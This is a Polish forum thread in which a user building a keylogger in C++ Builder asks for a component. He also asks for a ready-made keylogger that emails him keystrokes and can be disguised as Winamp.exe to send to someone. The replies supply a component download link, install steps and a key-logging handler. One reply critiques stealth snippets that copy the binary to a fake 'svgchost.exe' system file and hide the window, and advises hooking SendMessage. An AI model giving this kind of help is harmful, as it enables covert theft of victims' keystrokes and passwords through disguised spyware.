Pokaż wyniki 1 do 5 z 5

Temat: C++ Builder,Keyloger

  1. #1
    Zarejestrowany
    Apr 2008
    Postów
    2

    Domyślnie C++ Builder,Keyloger

    Potrzebuje pomocy, korzystam z poradnika http://www.zurawek.com/tutorial_keylogger.html
    i doszedłem do pewnego momentu w którym trzeba wejść w zakładkę Fastnet i w tym tkwi problem czy można sciągnąć do wersji darmowej ten komponent czy trzeba pobierać ten płatny builder (Trial) jeżeli tak prosił bym o podanie linku w którym mogę znalesć ten program,szukałem go w googlach cały dzień i niestety nie udało mi się go znaleść.Jeżeli ktoś by wiedział również skąd można sciągnąć gotowego keyloggera (taki keylogger żeby wszystko przychodziło na mojego maila np chcę wysłać komuś keyloggera umieścić go w jakimś pliku albo żeby np nazywał się Winamp.exe) Proszę o pomoc i proszę również o wyrozumiałość.
    Z góry dziękuje.

  2. #2
    Zarejestrowany
    Feb 2008
    Postów
    86

    Domyślnie

    Ta druga czesc to... google.pl A jak szukales rzeczywiscie caly dzien, to kiepsko szukasz.

  3. #3
    Zarejestrowany
    Apr 2008
    Postów
    24

    Domyślnie

    Witaj!
    1- Komponent KeySpyXP.
    2- Kod w BCB 06 (można się domyslić, ale podam ;p)

    OnKeySpyXP1:
    Kod:
    Memo1->Lines->Add(key);
    Reszte chyba będziesz wiedział, co do komponentu KeySpyXP1 -

    http://download.4programmers.net/KeySpyXP.zip

    Komponent jest napisany w Delhi, ale kompiluje się bezproblemowo w BCB - jak dodawać komponenty (nie chce mi się pisać, ale OK...):

    1. Wypakuj zawartość KeySpyXP do Cbuilder6 do katalogu Lib

    2. Otwórz BCb, z zakładki Component wybierz Install Component, zaznacz typ plików *.pas i odszukaj KeySpyXP1.pas

    3. Restart BCB i masz komponent
    Pozdrawiam!
    FX12

    PS: @Ogre - jeśli nie chcesz pomóc, nie nabijaj postów...

  4. #4
    Zarejestrowany
    Apr 2008
    Postów
    2

    Domyślnie

    Wielki + za pomoc i za to że chciało ci sie pisać

  5. #5
    h3x
    h3x jest offline Banned
    Zarejestrowany
    Dec 2007
    Postów
    271

    Domyślnie

    wtf, nie ten temat


    ...ale skoro post 'sie napisal' to cos dodam, w prawdzie nie na temat ale zwiazane z kodem:

    if(GetAsyncKeyState(character)==-32767)
    to nie jest wydajna metoda. Duzo lepiej jest shaczyc SendMessage. Pomijam mase wywolan fopen-fwrite-fclose. Od tego jest fflush! Kozystanie z crt tez nie wskazane przy programach ktore maja miec duza wydajnosc. Kernel32 obowiazkowo lub ntdll/syscalle jak ktos wie co robi.

    if (CopyFile(sciezka.c_str(), "c:\\windows\\svgchost.exe", true) == false) ShowMessage("Blad");
    noooooooom

    ShowWindow(Application->Handle, SW_HIDE);
    mhm
    Ostatnio edytowane przez h3x : 04-19-2008 - 19:11

Podobne wątki

  1. Borland C++ Builder Personal 6
    By kosiarz in forum C/C++
    Odpowiedzi: 4
    Autor: 03-25-2011, 21:01
  2. Potrzebny KeyLoger
    By Shiver in forum /dev/null
    Odpowiedzi: 2
    Autor: 03-01-2008, 19:35
  3. Tibia Keyloger
    By Arwetro in forum /dev/null
    Odpowiedzi: 2
    Autor: 12-04-2007, 22:45
  4. [Najlepszy] Keyloger do Tibii
    By Emal in forum Hacking
    Odpowiedzi: 4
    Autor: 07-13-2007, 09:59

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj